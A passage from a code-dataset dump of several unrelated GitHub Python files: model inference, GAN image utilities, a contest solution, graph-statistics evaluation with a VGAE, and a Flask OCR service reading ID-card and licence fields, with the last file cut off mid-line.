\n return output['choices'][0]['text'] \n\n\n\ndef main(args):\n if not os.path.exists(args.output_dir):\n os.makedirs(args.output_dir)\n \n # setup logging\n init_logger(args)\n\n # load model\n prediction = dict()\n model = GPT(args)\n model.set_new_key()\n\n # load data\n with gzip.open(args.task_dir, 'r') as f:\n fr = pickle.load(f)\n \n\n for t in fr:\n idx = t['file name']\n input_dict = {}\n name_list = ['label', 'age', 'sex', 'educ', 'marriage', 'apoe', 'mmse', 'fmri']\n for name in name_list:\n input_dict[name] = t[name]\n for id in range(22):\n input_dict['q{}'.format(id)] = t['q{}'.format(id)]\n\n # prompt making\n with open(os.path.join(args.base_dir, 'prompt', '{}.json'.format(args.prompt)), 'r') as f:\n prompt = f.read()\n model_input = prompt.format(**input_dict)\n\n logger.info(\"***** Model Input *****\")\n logger.info(model_input)\n\n # inference\n pred = model.inference(model_input)\n logger.info(\"***** Model Output *****\")\n logger.info({input_dict['label'] : pred})\n\n # saving\n prediction[idx] = {'groundtruth' : input_dict['label'] , 'prediction' : pred}\n \n # accuracy\n accr = Accuracy(prediction)\n logger.info(\"accuracy: {}\".format(accr))\n\n result = {'accuracy' : accr, 'predictions' : prediction }\n\n with open(os.path.join(args.output_dir, '{}_{:%Y-%m-%d-%H:%M:%S}_predicted_results.json'.format(args.prompt, datetime.datetime.now())), 'w', encoding='utf-8') as f:\n json.dump(result, f, indent=2)\n\n return accr\n\nif __name__ == \"__main__\":\n parser, args = load_parser_and_args()\n main(args)","repo_name":"seunbite/Medical","sub_path":"gpt_infer.py","file_name":"gpt_infer.py","file_ext":"py","file_size_in_byte":7394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4238217325","text":"import os\n\nfrom PIL import Image\nimport matplotlib.pyplot as plt\n\nfrom tensorflow.keras.utils import array_to_img\n\n\ndef get_dirs(save_dir):\n checkpoint_dir = os.path.join(save_dir, \"model_ckpts/ckpts\")\n log_dir = os.path.join(save_dir, \"tf_logs\")\n save_path = os.path.join(save_dir, \"training_progress\")\n\n os.makedirs(checkpoint_dir, exist_ok=True)\n os.makedirs(log_dir, exist_ok=True)\n os.makedirs(save_path, exist_ok=True)\n\n return checkpoint_dir, log_dir, save_path\n\n\ndef generate_images(model, test_input, target, save_path, step):\n prediction = model(test_input)\n\n if step % 500 == 0:\n plt.figure(figsize=(9, 3))\n\n display_list = [test_input[0], target[0], prediction[0]]\n title = ['Input Image', 'Ground Truth', 'Predicted Image']\n\n for i in range(3):\n plt.subplot(1, 3, i + 1)\n plt.title(title[i])\n plt.imshow(display_list[i] * 0.5 + 0.5)\n plt.axis('off')\n plt.tight_layout()\n plt.show()\n\n try:\n img = array_to_img(prediction[0] * 0.5 + 0.5)\n img.save(f'{save_path}/{step//100}.png')\n except Exception as e:\n print(e)\n pass\n","repo_name":"kmnis/comicface.ai","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31622702508","text":"# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\nimport sys\nimport os\nf = open('../../input.txt', 'r')\nsys.stdin = f\n\nfrom collections import deque\n\nw,h = map(int,input().split())\nn = int(input())\ntapes = [list(map(int,input().split())) for _ in range(n)]\n\n# まずは座標圧縮 O(NlogN)\nset_x = {0,w}\nset_y = {0,h}\nfor tape in tapes:\n set_x.add(tape[0])\n set_x.add(tape[2])\n set_y.add(tape[1])\n set_y.add(tape[3])\n\nlist_x = sorted(list(set_x))\nlist_y = sorted(list(set_y))\n\ndic_x = {}\ndic_y = {}\nfor list_, dic_ in zip([list_x, list_y], [dic_x, dic_y]):\n for i,val in enumerate(list_):\n dic_[val] = i\n\nfor i in range(n):\n x1,y1,x2,y2 = tapes[i]\n tapes[i][0] = dic_x[x1]\n tapes[i][1] = dic_y[y1]\n tapes[i][2] = dic_x[x2]\n tapes[i][3] = dic_y[y2]\n\n# imos法でテープの張られていない領域を求める O(N^2)\nw = len(list_x)-1\nh = len(list_y)-1\n\nimos = [[0] * (w+1) for _ in range(h+1)]\n\nfor tape in tapes:\n x1,y1,x2,y2 = tape\n imos[y1][x1] += 1\n imos[y1][x2] += -1\n imos[y2][x1] += -1\n imos[y2][x2] += 1\n\nfor i in range(h+1):\n for j in range(1,w+1):\n imos[i][j] += imos[i][j-1]\n\nfor i in range(1,h+1):\n for j in range(w+1):\n imos[i][j] += imos[i-1][j]\n\n# 左右に全探索する y*10000+xを座標情報にしておく。 O(N^2)\nwhites = set()\nfor i in range(h):\n for j in range(w):\n if(imos[i][j] == 0):\n whites.add(i*10000+j)\n\nd = deque()\nans = 0\nwhile(whites):\n ans += 1\n start = whites.pop()\n d.append(start)\n while(d):\n now = d.pop()\n for pl in [1,-1,10000,-10000]:\n next = now + pl\n if( next in whites):\n d.append(next)\n whites.remove(next)\n\nprint(ans)\n\n# 実装25分、バグとり30分\n# テープ右上の座標と、imosで扱うべき座標をうまく整理できていなかった\n# → 49~52行目でx2,y2をx2+1,y2+1にしてしまっていた。\n\n\n# for i in imos:\n# print(i)\n","repo_name":"komajun365/competitive_programming","sub_path":"JOI/joi2008ho/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73142346408","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef scatter_plot(features, labels, details):\n \"\"\"\n Do a scatter plot of points with boolean labels.\n\n :param features: a list of (x, y) points\n :param labels: a list of labels for each point\n :param details: a map of label to color and legend context\n \"\"\"\n (x, y), = np.dstack(features)\n labels = np.array(labels)\n for i, ctx in details.items():\n s = np.where(labels == i)\n plt.scatter(x[s], y[s], **ctx)\n\n\ndef decision_boundry_plot(clf):\n \"\"\"\n We make a \"grid\" of every point in the graph and make a prediction and plot\n the results\n \"\"\"\n steps = np.arange(0.0, 1.1, 0.01)\n x, y = np.meshgrid(steps, steps)\n map_features = np.c_[x.ravel(), y.ravel()]\n graph_labels = clf.predict(map_features)\n c = graph_labels.reshape(x.shape)\n plt.pcolormesh(x, y, c, cmap=plt.get_cmap('seismic'))\n\n\ndef prettyPicture(clf, features_test, labels_test):\n plt.close()\n decision_boundry_plot(clf)\n scatter_plot(features_test, labels_test, {\n 0: {'c': 'b', 'label': 'test_fast'},\n 1: {'c': 'r', 'label': 'test_slow'},\n })\n\n plt.xlim(0.0, 1.0)\n plt.ylim(0.0, 1.0)\n plt.xlabel(\"bumpiness\")\n plt.ylabel(\"grade\")\n plt.legend()\n plt.show()\n","repo_name":"clayg/udacity","sub_path":"ud120/5.08/tools/class_vis.py","file_name":"class_vis.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35113738735","text":"import os\nimport math\nimport random\nrandom.seed(10)\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport torch\nimport networkx as nx\ntorch.manual_seed(120)\nfrom torch.utils.data import random_split, Dataset\nfrom torch_geometric.data import Data\nfrom torch_geometric.utils import subgraph, to_undirected\nfrom torch_geometric.datasets import EmailEUCore\n# from datasets.abstract_dataset import AbstractDataModule, AbstractDatasetInfos\nimport torch.nn.functional as F\nimport numpy as np\nfrom sklearn import metrics\nfrom torch_geometric.utils.convert import from_networkx\nfrom itertools import combinations\n\nimport torch\nfrom torch_geometric.datasets import Planetoid,SNAPDataset, StochasticBlockModelDataset, AttributedGraphDataset\nimport torch_geometric.transforms as T\nfrom torch_geometric.nn import GCNConv\nfrom torch_geometric.utils import train_test_split_edges\nfrom graph_statistics import compute_graph_statistics\nfrom graph_statistics import power_law_alpha,gini\nimport pandas as pd\n# import seaborn as sns\nimport pickle\n\n\n\ndef mmd_rbf(X, Y, gamma=1.0):\n \"\"\"MMD using rbf (gaussian) kernel (i.e., k(x,y) = exp(-gamma * ||x-y||^2 / 2))\n Arguments:\n X {[n_sample1, dim]} -- [X matrix]\n Y {[n_sample2, dim]} -- [Y matrix]\n Keyword Arguments:\n gamma {float} -- [kernel parameter] (default: {1.0})\n Returns:\n [scalar] -- [MMD value]\n \"\"\"\n XX = metrics.pairwise.rbf_kernel(X, X, gamma)\n YY = metrics.pairwise.rbf_kernel(Y, Y, gamma)\n XY = metrics.pairwise.rbf_kernel(X, Y, gamma)\n return XX.mean() + YY.mean() - 2 * XY.mean()\n\n\ndef squares(G, nodes=None):\n r\"\"\"Borrowed from networkx square clustering, this could be made much more efficient.\n \"\"\"\n if nodes is None:\n node_iter = G\n else:\n node_iter = G.nbunch_iter(nodes)\n squares = 0\n for v in node_iter:\n for u, w in combinations(G[v], 2):\n squares += len((set(G[u]) & set(G[w])) - {v})\n return squares/4\n\ndegrees = []\npower_stats = []\nedge_syn_lists = []\nassortativity = []\ncluster = []\ngini_coef = []\nfor i in range(1,11,1):\n with open('outputs/email-eucore_stop_thresh_syngr_30ktrain_rw_200e_grsize40_batch32_right_progressive_percentage/15-51-32/' +str(i)+'_edge_list.pkl','rb') as f:\n # edge_list_syn = []\n # for edge in f.readlines():\n # e = edge.decode().strip('\\n').split(',')\n #\n edge_list_syn = pickle.load(f)\n edge_syn_lists.append(edge_list_syn)\n\n syn_graph = nx.from_edgelist(edge_list_syn, create_using=nx.Graph())\n deg =sorted((d for n, d in syn_graph.degree()), reverse=True)\n\n degrees.append(np.unique(deg, return_counts=True))\n\n # graphs.data.edge_index = to_undirected(graphs.data.edge_index)\n # edge_list_tensor = to_undirected(graphs.data.edge_index)\n # edge_list_tensor = edge_list_tensor.transpose(0, 1)\n # edge_list = [(int(i[0]), int(i[1])) for i in edge_list_tensor]\n # real_graph = nx.from_edgelist(edge_list)\n gini_coef.append(gini(nx.to_scipy_sparse_array(syn_graph)))\n power_stats.append(power_law_alpha(nx.to_scipy_sparse_array(syn_graph)))#sum(nx.triangles(syn_graph.to_undirected()).values()) / 3)\n assortativity.append(nx.degree_assortativity_coefficient(syn_graph))\n cluster.append(nx.average_clustering(syn_graph))\n\nprint(degrees[0])\n\nwith open('outputs/Synthetic_benchmark/DSBM_edge_list_sbm.pkl','rb') as f:\n edge_list_syn = pickle.load(f)\n# plot lines\n# plt.plot(list(range(10)), triangle_stats, label = \"Unif 100 epochs\", color ='blue',linestyle = 'dashed')\n\n# df = pd.DataFrame({'assort.': assortativity,\n# 'real assort.':[-0.01099 for i in range(10)],\n# 'syn pow law':power_stats,\n# 'real pow law': [1.3613 for i in range(10)],\n# 'syn. clust. coef.':cluster,\n# 'real. clust. coef.':[0.39935 for i in range(10)],\n# 'gini coef.':gini_coef,\n# 'real gini coef.':[0.57105 for i in range(10)]})\n#\n#\n#\n#\n# sns.set_style(\"darkgrid\")\n#\n#\n# fig,axs = plt.subplots(2,2)\n\n# a=sns.histplot(degrees[0],ax=axs[0])\n\n# g = sns.FacetGrid(data=df)#, palette=['red', 'red', 'blue', 'blue', 'purple', 'purple','green','green'])#,markers=True)\n# g.map(plt.plot)\n\n\n\n\n# g.set_xticks(range(len(df)))\n# g.set_xticklabels([10*i for i in range(1,11,1)])\n#\n#\n# axs[0,0].plot([10*i for i in range(1,11,1)], assortativity, label = \"syn assort.\", color ='blue', linestyle = 'dashed', marker = '*')\n# axs[0,0].plot([10*i for i in range(1,11,1)], [-0.01099 for i in range(10)], label = \"real assort.\", color ='blue')\n# axs[0,0].set_xlabel(\"Percentage of |E|\")\n# axs[0,0].set_ylabel('Assortativity')\n# # axs[0,0].legend()\n#\n#\n# axs[0,1].plot([10*i for i in range(1,11,1)], power_stats, label = \"syn assort.\", color ='purple', linestyle = 'dashed',marker = '*')\n# axs[0,1].plot([10*i for i in range(1,11,1)], [1.3613 for i in range(10)], label = \"real assort.\", color ='purple')\n# axs[0,1].set_xlabel(\"Percentage of |E|\")\n# axs[0,1].set_ylabel('Pow law alpha')\n# # axs[0,1].legend()\n#\n# axs[1,0].plot([10*i for i in range(1,11,1)], cluster, label = \"clust. coef.\", color = 'orange',linestyle = 'dashed',marker = '*')\n# axs[1,0].plot([10*i for i in range(1,11,1)], [0.39935 for i in range(10)], label = \"real clust. coef.\", color ='orange')\n# axs[1,0].set_xlabel(\"Percentage of |E|\")\n# axs[1,0].set_ylabel('Clust. Coef.')\n# # axs[1,0].legend()\n#\n# axs[1,1].plot([10*i for i in range(1,11,1)], gini_coef, label = \"gini coef.\", color = 'red',linestyle = 'dashed',marker = '*')\n# axs[1,1].plot([10*i for i in range(1,11,1)], [0.57105 for i in range(10)], label = \"real gini coef.\", color ='red')\n# axs[1,1].set_xlabel(\"Percentage of |E|\")\n# axs[1,1].set_ylabel('Gini Coef.')\n# axs[1,1].legend()\n#\n# # plt.ylabel(\"metric\")\n# #\n\n\n# #\n# plt.legend(loc='upper left')\n# plt.show()\n\nedge_list_syn = np.load('outputs/Synthetic_benchmark/EmailEUCore_our_vae_generated_graph.npy')\n # edge_list_syn.append((int(e[0]),int(e[1])))\n# import pdb; pdb.set_trace()\n# edge_list_syn = nx.from_edgelist('outputs/Synthetic_benchmark/Cora_NetGAN_generated_graph.npy',create_using=nx.DiGraph())\n\n#\nbase_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, os.pardir, 'data')\n\n\n\n\n# sbm_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data')\n#\n# graphs = torch.load('datasets\\data\\direct_sbm_dataset.pt')\n\n# # # #\n# # #\n# graphs = StochasticBlockModelDataset(base_path,block_sizes = [400,400,400,400],edge_probs = [[0.15,0.01,0.01,0.01],\n# [0.01,0.15,0.01,0.01],\n# [0.01,0.01,0.15,0.01],\n# [0.01,0.01,0.01,0.15]])\n# #\n# graphs.data.num_nodes = 1600\n# print(graphs.data)\n# torch.save(graphs,'sbm_test_in_out_4_1600_nodes.pt')\n# qgf\n# graphs = torch.load('sbm_test_in_out_4_1600_nodes.pt')\n\n\n#\n# edge_list = [(int(i[0]), int(i[1])) for i in graphs.data.edge_index.transpose(0,1)]\n#\n# real_graph = nx.from_edgelist(edge_list, create_using=nx.Graph())\n# import pdb;pdb.set_trace()\n# graphs = Planetoid(\"\\..\", \"Cora\", transform=T.NormalizeFeatures())\n#import pdb;pdb.set_trace()\n\n# graphs = AttributedGraphDataset(base_path,\"Wiki\")\ngraphs = EmailEUCore(base_path)\n# graphs = SNAPDataset(base_path,\"ego-facebook\").get(1)\n#\n#\n#\n# graphs.data = Data(x=graphs.x, edge_index=graphs.edge_index, n_nodes=graphs.num_nodes)\nprint(graphs.data)\n# data = dataset[0]\n# data.train_mask = data.val_mask = data.test_mask = data.y = None\n# data = train_test_split_edges(data)\n\n# print(data)\n\n#sum(nx.triangles(G).values()) / 3\n\n#syn_graph = nx.from_edgelist(random.choices(list(set(edge_list_syn)),k=27000), create_using=nx.Graph())\ndir = False\nif dir == True:\n\n syn_graph = nx.from_edgelist(edge_list_syn, create_using=nx.DiGraph())\n\n edge_list = [(int(i[0]), int(i[1])) for i in graphs.data.edge_index.transpose(0,1)]\n # syn_graph = nx.from_edgelist(edge_list)\n\n real_graph = nx.from_edgelist(edge_list, create_using=nx.DiGraph())\n\n print(len(list(syn_graph.nodes())))\n print(len(list(syn_graph.edges())))\nif dir == False:\n\n syn_graph = nx.from_edgelist(edge_list_syn, create_using=nx.Graph())\n graphs.data.edge_index = to_undirected(graphs.data.edge_index)\n edge_list_tensor = to_undirected(graphs.data.edge_index)\n edge_list_tensor = edge_list_tensor.transpose(0,1)\n\n edge_list = [(int(i[0]),int(i[1])) for i in edge_list_tensor]\n # syn_graph = nx.from_edgelist(edge_list)\n real_graph = nx.from_edgelist(edge_list)\n print(graphs)\n print(len(list(syn_graph.nodes())))\n\n print(len(list(syn_graph.edges())))\n\nprint(compute_graph_statistics(real_graph))\n\nprint(compute_graph_statistics(syn_graph))\n\n\n\n#\n# print(f'Number of triangles in the real graph: {sum(nx.triangles(real_graph.to_undirected()).values()) / 3}')\n# print(f'Number of triangles in the synthetic graph: {sum(nx.triangles(syn_graph.to_undirected()).values()) / 3}')\n#\n# print(f'Assortativity in the real graph: {nx.degree_assortativity_coefficient(real_graph)}')\n# print(f'Assortativity in the synthetic graph: {nx.degree_assortativity_coefficient(syn_graph)}')\n#\n# print(f'Clustering coef in the real graph: {nx.average_clustering(real_graph)}')\n# print(f'Clustering coef in the synthetic graph: {nx.average_clustering(syn_graph)}')\n#\n# degree_sequence_syn = sorted((d for n, d in syn_graph.degree()), reverse=True)\n# degree_sequence_real = sorted((d for n, d in real_graph.degree()), reverse=True)\n#\n# #\n# k_core_syn = sorted((d for n, d in nx.core_number(syn_graph.remove_edges_from(nx.selfloop_edges(syn_graph)))), reverse=True)\n# k_core_real = sorted((d for n, d in nx.core_number(real_graph.remove_edges_from(nx.selfloop_edges(real_graph)))), reverse=True)\n#\n# print(f'core number in the real graph: {max(k_core_real)}')\n# print(f'core number in the synthetic graph: {max(k_core_syn)}')\n#\n#\n# print(f'number of squares in the real graph: {squares(real_graph)}')\n# print(f'number of squares in the synthetic graph: {squares(syn_graph)}')\n#\n#\n#\n#\n# print(f'Max degree coef in the real graph: {max(degree_sequence_real)}')\n# print(f'Max degree coef in the synthetic graph: {max(degree_sequence_syn)}')\n\n\n\n\nimport pdb;pdb.set_trace()\n\nreal_torch_graph = torch.tensor(np.array(list(real_graph.edges())).T,dtype=torch.long)\n\n\nreal_data = Data(edge_index = real_torch_graph, num_nodes = graphs.data.num_nodes)\n\ndegree_sequence_syn = sorted((d for n, d in syn_graph.degree()), reverse=True)\nsyn_distrib = np.unique(degree_sequence_syn)*1./(sum(np.unique(degree_sequence_syn)))\n\n\ndegree_sequence_real = sorted((d for n, d in real_graph.degree()), reverse=True)\nreal_distrib = np.unique(degree_sequence_real) * 1. / (sum(np.unique(degree_sequence_real)))\n\n#syn_torch_graph = from_networkx(syn_graph)\n\nsyn_torch_graph = torch.tensor(np.array(list(syn_graph.edges())).T,dtype=torch.long)\n\nsyn_torch_graph = Data(edge_index = syn_torch_graph, num_nodes = graphs.data.num_nodes)\n\n#syn_torch_graph.edge_index = to_undirected(syn_torch_graph.edge_index)\n\n# import numpy as np\n# import matplotlib.pyplot as plt\n# fig = plt.figure(\"Degree of a random graph\", figsize=(8, 8))\n#\n# axgrid = fig.add_gridspec(5, 4)\n# ax2 = fig.add_subplot(axgrid[0:3,:])\n# ax2.bar(*np.unique(degree_sequence_syn, return_counts=True),color='red',label='Synthetic Graph')\n# ax2.bar(*np.unique(degree_sequence_real, return_counts=True),label = 'Real Graph')\n# ax2.set_title(\"Degree histogram\")\n# ax2.set_xlabel(\"Degree\")\n# ax2.set_ylabel(\"Number of Nodes\")\n# ax2.legend()\n# fig.tight_layout()\n# plt.show()\n\nprint(syn_torch_graph)\n\n\nprint(real_data)\nsyn_torch_graph = syn_torch_graph\n\nsyn_torch_graph.num_nodes=graphs.data.num_nodes\n\nsyn_torch_graph.x=torch.eye(graphs.data.num_nodes, dtype = torch.float32)#*1./graphs.data.num_nodes\n\ndata = train_test_split_edges(syn_torch_graph)\n\nprint(data.x)\n\nclass GCNEncoder(torch.nn.Module):\n def __init__(self, in_channels, out_channels):\n super(GCNEncoder, self).__init__()\n self.conv1 = GCNConv(in_channels, 2 * out_channels, cached=True) # cached only for transductive learning\n self.conv2 = GCNConv(2 * out_channels, out_channels, cached=True) # cached only for transductive learning\n\n def forward(self, x, edge_index):\n x = self.conv1(x, edge_index).relu()\n return self.conv2(x, edge_index)\n\n\nfrom torch_geometric.nn import VGAE\nfrom torch_geometric.nn import GAE\n#\n# out_channels = 2\n# num_features = 20\n# epochs = 100\n#\n# # model\n# model = GAE(GCNEncoder(num_features, out_channels))\n#\n# # move to GPU (if available)\n# device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n# model = model.to(device)\n# x = data.x.to(device)\n# train_pos_edge_index = data.train_pos_edge_index.to(device)\n#\n# # inizialize the optimizer\n# optimizer = torch.optim.Adam(model.parameters(), lr=0.01)\n\n\ndef train():\n model.train()\n optimizer.zero_grad()\n z = model.encode(x, train_pos_edge_index)\n loss = model.recon_loss(z, train_pos_edge_index)\n\n loss = loss + (1 / data.num_nodes) * model.kl_loss() # new line\n loss.backward()\n optimizer.step()\n return float(loss)\n\n\ndef test(pos_edge_index, neg_edge_index):\n model.eval()\n with torch.no_grad():\n z = model.encode(x, train_pos_edge_index)\n return model.test(z, pos_edge_index, neg_edge_index)\n\nfrom torch.utils.tensorboard import SummaryWriter\n\nclass VariationalGCNEncoder(torch.nn.Module):\n def __init__(self, in_channels, out_channels):\n super(VariationalGCNEncoder, self).__init__()\n self.conv1 = GCNConv(in_channels, 2 * out_channels, cached=True) # cached only for transductive learning\n self.conv_mu = GCNConv(2 * out_channels, out_channels, cached=True)\n self.conv_logstd = GCNConv(2 * out_channels, out_channels, cached=True)\n\n def forward(self, x, edge_index):\n x = self.conv1(x, edge_index).relu()\n return self.conv_mu(x, edge_index), self.conv_logstd(x, edge_index)\n\nout_channels = 2\nnum_features = graphs.data.num_nodes\nepochs = 300\nprint('la')\n\nmodel = VGAE(VariationalGCNEncoder(num_features, out_channels)) # new line\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nmodel = model.to(device)\nx = data.x.to(device)\ntrain_pos_edge_index = data.train_pos_edge_index.to(device)\noptimizer = torch.optim.Adam(model.parameters(), lr=0.01)\n\nwriter = SummaryWriter('runs/VGAE_experiment_' + '2d_100_epochs')\n\nprint('la')\ngraphs.data.x = torch.tensor([[1] for i in range(graphs.data.num_nodes)], dtype = torch.float32)\n\n\ndata_real = train_test_split_edges(real_data.to(device), test_ratio = 0.9)\n\nfor epoch in range(1, epochs + 1):\n loss = train()\n auc, ap = test(data.test_pos_edge_index, data.test_neg_edge_index)\n print('Epoch: {:03d}, AUC: {:.4f}, AP: {:.4f}'.format(epoch, auc, ap))\n\n writer.add_scalar('auc train', auc, epoch) # new line\n writer.add_scalar('ap train', ap, epoch) # new line\n\nauc, ap = test(data_real.test_pos_edge_index, data_real.test_neg_edge_index)\nprint('Final test vs real, AUC: {:.4f}, AP: {:.4f}'.format(auc, ap))\n\nqewf\na = model.decoder.forward_all(model.encode(x,train_pos_edge_index))\n\nuni = np.random.uniform(0,35,num_features*num_features).reshape(num_features,num_features)\nb = torch.tensor(uni)<=a.cpu()\nG =nx.from_numpy_matrix(np.array(b*1))\nG.remove_edges_from(nx.selfloop_edges(G))\nedge_list_samples = list(G.edges())\n\n\n\nwith open('vgae_eucore_edge_list.pkl', 'wb') as f:\n pickle.dump(edge_list_samples, f)\n\n\nimport pdb; pdb.set_trace()\n\n\n\n\n\n\n","repo_name":"Slimnios/SaGess","sub_path":"src/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":15690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6335505422","text":"# create hello world flask app in python3\nfrom flask import Flask, request\nfrom flask_cors import CORS\nimport cv2\nimport numpy as np\nimport pytesseract\n\n\ncustom_config = r'--oem 3 --psm 6'\n\napp = Flask(__name__)\nCORS(app)\n\n\n# class Field having 4 coordinates\nclass Field:\n def __init__(self, x1_percent, y1_percent, x2_percent, y2_percent):\n self.x1_percent = x1_percent\n self.y1_percent = y1_percent\n self.x2_percent = x2_percent\n self.y2_percent = y2_percent\n\n def drawRect(self, output):\n x1 = int(output.shape[1] * self.x1_percent / 100)\n y1 = int(output.shape[0] * self.y1_percent / 100)\n x2 = int(output.shape[1] * self.x2_percent / 100)\n y2 = int(output.shape[0] * self.y2_percent / 100)\n cv2.rectangle(output, (x1, y1), (x2, y2), (0, 255, 0), 2)\n\n def getCroppedImage(self, output):\n x1 = int(output.shape[1] * self.x1_percent / 100)\n y1 = int(output.shape[0] * self.y1_percent / 100)\n x2 = int(output.shape[1] * self.x2_percent / 100)\n y2 = int(output.shape[0] * self.y2_percent / 100)\n return output[y1:y2, x1:x2]\n\n def getDataInIt(self, image):\n return pytesseract.image_to_string(self.getCroppedImage(image), config=custom_config).strip()\n\n\n# get grayscale image\ndef get_grayscale(image):\n return cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n# noise removal\n\n\ndef remove_noise(image):\n return cv2.medianBlur(image, 5)\n\n# thresholding\n\n\ndef thresholding(image):\n return cv2.threshold(image, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)[1]\n\n# dilation\n\n\ndef dilate(image):\n kernel = np.ones((5, 5), np.uint8)\n return cv2.dilate(image, kernel, iterations=1)\n\n# erosion\n\n\ndef erode(image):\n kernel = np.ones((5, 5), np.uint8)\n return cv2.erode(image, kernel, iterations=1)\n\n# opening - erosion followed by dilation\n\n\ndef opening(image):\n kernel = np.ones((5, 5), np.uint8)\n return cv2.morphologyEx(image, cv2.MORPH_OPEN, kernel)\n\n# canny edge detection\n\n\ndef canny(image):\n return cv2.Canny(image, 100, 200)\n\n# skew correction\n\n\ndef deskew(image):\n coords = np.column_stack(np.where(image > 0))\n angle = cv2.minAreaRect(coords)[-1]\n if angle < -45:\n angle = -(90 + angle)\n else:\n angle = -angle\n (h, w) = image.shape[:2]\n center = (w // 2, h // 2)\n M = cv2.getRotationMatrix2D(center, angle, 1.0)\n rotated = cv2.warpAffine(\n image, M, (w, h), flags=cv2.INTER_CUBIC, borderMode=cv2.BORDER_REPLICATE)\n return rotated\n\n# template matching\n\n\ndef match_template(image, template):\n return cv2.matchTemplate(image, template, cv2.TM_CCOEFF_NORMED)\n\n\ndef readAndTransformImage(imageFromRequest):\n numpyImage = np.fromfile(imageFromRequest, np.uint8)\n file = cv2.imdecode(numpyImage, cv2.IMREAD_COLOR)\n\n image = get_grayscale(file)\n image = cv2.threshold(image, 127, 255, 0)[1]\n\n return image\n\n\ndef getCinFront(requestFile):\n image = readAndTransformImage(requestFile)\n\n # coordinates of the 4 fields large space\n nameField = Field(0, 31, 50, 38)\n familyNameField = Field(0, 44, 50, 51)\n dateField = Field(20, 50, 40, 57)\n placeField = Field(2, 64, 50, 71)\n validDateField = Field(25, 70, 45, 77)\n idField = Field(68, 76, 88, 83)\n\n name = nameField.getDataInIt(image)\n familyName = familyNameField.getDataInIt(image)\n date = dateField.getDataInIt(image)\n place = placeField.getDataInIt(image)\n validDate = validDateField.getDataInIt(image)\n id = idField.getDataInIt(image)\n\n return {\n 'name': name,\n 'familyName': familyName,\n 'date': date,\n 'place': place,\n 'validDate': validDate,\n 'id': id\n }\n\n\ndef getCinBack(requestFile):\n image = readAndTransformImage(requestFile)\n\n # coordinates of the 4 fields large space\n idField = Field(10, 2, 22, 8)\n validDateField = Field(65, 2, 80, 9)\n fatherNameField = Field(12, 23, 60, 29)\n motherNameField = Field(10, 29, 60, 36)\n addressField = Field(12.3, 48, 75, 56)\n maritalStatusField = Field(20, 60, 40, 68)\n genderField = Field(80, 60, 88, 68)\n\n id = idField.getDataInIt(image)\n validDate = validDateField.getDataInIt(image)\n fatherName = fatherNameField.getDataInIt(image)\n motherName = motherNameField.getDataInIt(image)\n address = addressField.getDataInIt(image)\n maritalStatus = maritalStatusField.getDataInIt(image)\n gender = genderField.getDataInIt(image)\n\n return {\n 'id': id,\n 'validDate': validDate,\n 'fatherName': fatherName,\n 'motherName': motherName,\n 'address': address,\n 'maritalStatus': maritalStatus,\n 'gender': gender,\n }\n\ndef getCinBack(requestFile):\n image = readAndTransformImage(requestFile)\n\n # coordinates of the 4 fields large space\n idField = Field(10, 2, 22, 8)\n validDateField = Field(65, 2, 80, 9)\n fatherNameField = Field(12, 23, 60, 29)\n motherNameField = Field(10, 29, 60, 36)\n addressField = Field(12.3, 48, 75, 56)\n maritalStatusField = Field(20, 60, 40, 68)\n genderField = Field(80, 60, 88, 68)\n\n id = idField.getDataInIt(image)\n validDate = validDateField.getDataInIt(image)\n fatherName = fatherNameField.getDataInIt(image)\n motherName = motherNameField.getDataInIt(image)\n address = addressField.getDataInIt(image)\n maritalStatus = maritalStatusField.getDataInIt(image)\n gender = genderField.getDataInIt(image)\n\n return {\n 'id': id,\n 'validDate': validDate,\n 'fatherName': fatherName,\n 'motherName': motherName,\n 'address': address,\n 'maritalStatus': maritalStatus,\n 'gender': gender,\n }\n\n\ndef getPermisFront(requestFile):\n image = readAndTransformImage(requestFile)\n\n nameField = Field(37, 33, 70, 39)\n familyNameField = Field(37, 49, 70, 55)\n dateField = Field(37, 60, 70, 66)\n placeField = Field(37, 71, 70, 76)\n deliveryPlaceField = Field(49, 81, 70, 85)\n deliveryDateField = Field(45, 85, 63, 91)\n permisTypeField = Field(39, 92, 42.5, 98)\n permisNumberField = Field(69, 18, 85, 24)\n CINField = Field(80, 60, 95, 66)\n\n name = nameField.getDataInIt(image)\n familyName = familyNameField.getDataInIt(image)\n date = dateField.getDataInIt(image)\n place = placeField.getDataInIt(image)\n deliveryPlace = deliveryPlaceField.getDataInIt(image)\n deliveryDate = deliveryDateField.getDataInIt(image)\n permisType = permisTypeField.getDataInIt(image)\n permisNumber = permisNumberField.getDataInIt(image)\n CIN = CINField.getDataInIt(image)\n\n return {\n 'name': name,\n 'familyName': familyName,\n 'date': date,\n 'place': place,\n 'deliveryPlace': deliveryPlace,\n 'deliveryDate': deliveryDate,\n 'permisType': permisType,\n 'permisNumber': permisNumber,\n 'CIN': CIN,\n }\n\n\ndef getPermisBack(requestFile):\n image = readAndTransformImage(requestFile)\n\n endOfValidity = Field(11, 63, 29, 70)\n smallSerie = Field(5, 73, 35, 80)\n largeSerie = Field(3, 86, 97, 97)\n\n endOfValidity = endOfValidity.getDataInIt(image)\n smallSerie = 